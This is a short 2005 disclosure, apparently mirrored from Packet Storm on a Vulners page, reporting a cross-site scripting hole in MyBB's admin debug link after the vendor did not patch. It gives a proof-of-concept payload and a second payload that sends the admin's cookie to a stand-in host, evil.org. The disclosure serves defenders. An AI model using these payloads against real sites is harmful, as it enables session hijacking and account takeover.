Lucene search
mybbXSS.txt
๐๏ธย 07 Sep 2005ย 00:00:00Reported byย robokoderTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 35ย Views
XSS vulnerability in all MyBB versions including PR2. Debug link on admin pages allows injection of malicious scripts
Show more
`XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
Vendor: given SEVEN days notice, no patch released!
Just to say, I am apalled with the fact that I contacted MyBB on the 30
August, and was originally not planning to go public.
However, because they have failed to release a patch I have decided to
alert the wider community.
At the bottom of every page shown to the admins is a debug link.
Unfortunately, this fails to properly sanitize user input, so, for
example, you could try:
'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</scrip
t>'
Although only admins can exploit this vuln, someone could send them a
link such as
[forumdisplay.php?fid=2&datecut=
<http://www.forum.com/forumdisplay.php?fid=2&datecut=>
""><script>window.location="http://evil.org/steal.php?cookie="+document.
cookie</script>]
and ouch!
robokoder
fusionnx.com- The Web Developer's Resource Centre
#####################################################################################
This email has been scanned by MailMarshal, an email content filter.
#####################################################################################
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo07 Sep 2005 00:00Current
7.4High risk
Vulners AI Score7.4